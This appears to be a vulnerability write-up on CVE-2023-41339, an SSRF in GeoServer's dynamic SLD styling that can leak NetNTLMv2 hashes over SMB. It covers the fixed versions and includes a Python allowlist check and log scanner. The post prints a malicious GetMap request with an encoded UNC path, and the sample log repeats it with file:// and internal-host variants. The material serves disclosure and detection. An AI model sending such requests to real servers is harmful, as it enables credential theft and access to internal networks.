GeoServer is a widely used open source server, written in Java, for managing and sharing geospatial data. It implements OGC web service standards such as the Web Map Service (WMS). One WMS feature lets a client supply its own "dynamic styling" by passing the URL of a remote SLD document in the "sld=" parameter of the GetMap, GetLegendGraphic and GetFeatureInfo operations. Because the server fetches that URL on the client's behalf, the feature is a Server-Side Request Forgery (SSRF) vector unless the URL is validated. In this post we dissect CVE-2023-41339, an SSRF in this code path that can be used to make the server initiate outbound SMB connections and leak NetNTLMv2 hashes, which in turn can enable further unauthorized access to the targeted network. We also cover the fix shipped in GeoServer versions 2.22.5 and 2.23.2.

Exploit Details

The core of the issue is that the URL supplied in the "sld=" parameter of a GetMap, GetLegendGraphic or GetFeatureInfo request was fetched without any validation of its scheme or host. An attacker can therefore craft a URL that makes the GeoServer process connect to internal network services, or to an attacker-controlled host, and potentially disclose sensitive information such as the NetNTLMv2 hash of the account GeoServer runs as. A captured hash can be relayed to another service that accepts NTLM authentication, or cracked offline, to gain unauthorized access.

Here is an example of a malicious GET request exploiting the SSRF vulnerability:

GET /geoserver/wms?request=GetMap&sld=http://%5B::1%5D:%5C%5C%5C%5C127...1%5CSMB%5Cexploit HTTP/1.1
Host: vulnerable_geoserver

Percent-decoded, the "sld=" value is http://[::1]:\\\\127...1\SMB\exploit: an http URL whose host is the IPv6 loopback address (::1) and whose "port" is a UNC-style path (127...1\SMB\exploit). The idea is that the style loader ends up treating the backslash path as a file share, so the server opens an SMB connection and authenticates to it with the NetNTLMv2 response of its service account. Two caveats apply. First, the hash is only useful if an attacker receives it, so in a real attack the SMB host would be one the attacker controls or can monitor rather than a purely internal address. Second, the NTLM authentication is performed by the Windows SMB client when the JVM resolves a UNC path; a GeoServer running on Linux does not leak hashes this way, although the underlying SSRF still lets an attacker reach internal HTTP services from the server.

Patch and Affected Versions

The GeoServer development team has acknowledged this vulnerability and fixed it in versions 2.22.5 and 2.23.2. Upgrading to one of these versions (or later) removes the SSRF vulnerability. Details about the patches can be found in the release notes here:

- GeoServer 2.22.5 Release Notes
- GeoServer 2.23.2 Release Notes

To further secure your GeoServer instance, enable URL checks for dynamic styles and configure them to allow only the locations from which you expect remote SLD documents to be loaded, or disable dynamic styling entirely if you do not use it, as described in the official GeoServer documentation:

- GeoServer: Enabling Dynamic Styles
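The following Python script is an added example, not code from the original post or from the GeoServer project. It approximates the idea behind the URL checks recommended above (a scheme and host allowlist for remote SLD documents that rejects backslash/UNC values, non-HTTP schemes and loopback, private or link-local hosts) and then runs that check over a few constructed access-log lines, including the request from the Exploit Details section verbatim, to flag exploitation attempts against a pre-patch server. The allowlisted host styles.example.org, the client addresses and the log lines are all made up for the example; GeoServer's real URL Checks are configured through its admin UI, not through this code.

```python
"""Allowlist check for WMS sld= URLs, plus a scan of access-log lines for abuse.

Added example; an approximation of the idea behind GeoServer's URL checks,
not GeoServer's own code. Hosts, log lines and addresses are constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist: the only origin from which remote SLD documents
# are expected to be loaded on this imaginary deployment.
ALLOWED_SLD_HOSTS = {"styles.example.org"}
ALLOWED_SCHEMES = {"http", "https"}

# Extracts the request target from a Common Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_internal_host(host):
    """True for loopback, private, link-local, unspecified or reserved addresses.

    Hostnames that are not IP literals are only treated as internal when they
    are 'localhost'; name resolution is deliberately not performed here.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().rstrip(".") == "localhost"
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)


def check_sld_url(value):
    """Decide whether a percent-decoded sld= value may be fetched.

    Returns (allowed, reason). Checks run from cheapest to most specific:
    backslashes (UNC paths, the SMB/NTLM leak vector), then scheme, then host.
    """
    if "\\" in value:
        return False, "backslash/UNC path in URL"
    parts = urlsplit(value)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme or '(none)'} not allowed"
    host = parts.hostname  # IPv6 brackets stripped, lowercased
    if not host:
        return False, "no host"
    if is_internal_host(host):
        return False, f"internal host {host}"
    if host not in ALLOWED_SLD_HOSTS:
        return False, f"host {host} not in allowlist"
    return True, "ok"


def extract_sld(target):
    """Return the decoded sld= value from a request target, or None.

    WMS parameter names are case-insensitive, so SLD= and sld= both count.
    """
    query = urlsplit(target).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key.lower() == "sld" and values:
            return values[0]
    return None


def scan_log(text):
    """Return (client, decoded sld value, reason) for every rejected request."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        sld = extract_sld(match.group("target"))
        if sld is None:
            continue
        allowed, reason = check_sld_url(sld)
        if not allowed:
            findings.append((line.split(" ", 1)[0], sld, reason))
    return findings


# Constructed sample log lines (not real traffic). The second line carries the
# request shown in this post verbatim; the others are made-up variants.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2023:18:17:30 +0000] "GET /geoserver/wms?service=WMS&request=GetMap&layers=topp:states&sld=https://styles.example.org/states.sld HTTP/1.1" 200 5120
198.51.100.7 - - [25/Oct/2023:18:18:02 +0000] "GET /geoserver/wms?request=GetMap&sld=http://%5B::1%5D:%5C%5C%5C%5C127...1%5CSMB%5Cexploit HTTP/1.1" 400 312
198.51.100.7 - - [25/Oct/2023:18:18:09 +0000] "GET /geoserver/wms?request=GetLegendGraphic&SLD=file://198.51.100.7/share/x.sld HTTP/1.1" 500 0
198.51.100.7 - - [25/Oct/2023:18:18:31 +0000] "GET /geoserver/wms?request=GetFeatureInfo&sld=http://127.0.0.1:8080/geoserver/rest/ HTTP/1.1" 500 0
10.0.0.8 - - [25/Oct/2023:18:19:00 +0000] "GET /geoserver/wms?request=GetMap&layers=topp:states HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for client, sld, reason in scan_log(SAMPLE_LOG):
        print(f"{client}  {reason}: {sld}")
```

The backslash test runs first on purpose: a value such as the one in this post never reaches the URL parser, so no amount of clever host or port formatting can slip a UNC path past the check. Note that the scanner only classifies what is in the query string; whether a given request actually triggered an SMB connection depends on the server's version and platform, as discussed above.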

Conclusion

The SSRF vulnerability in GeoServer (CVE-2023-41339) poses a significant risk to unpatched systems: an attacker can make the server issue requests on their behalf and, on a Windows host, capture the NetNTLMv2 hash of the GeoServer service account. Upgrading to GeoServer 2.22.5 or 2.23.2 (or later), and restricting dynamic styles with URL checks or disabling them when they are not needed, closes this vector and improves the overall security posture of your geospatial data server.

Timeline

Published on: 10/25/2023 18:17:30 UTC
Last modified on: 10/31/2023 19:53:57 UTC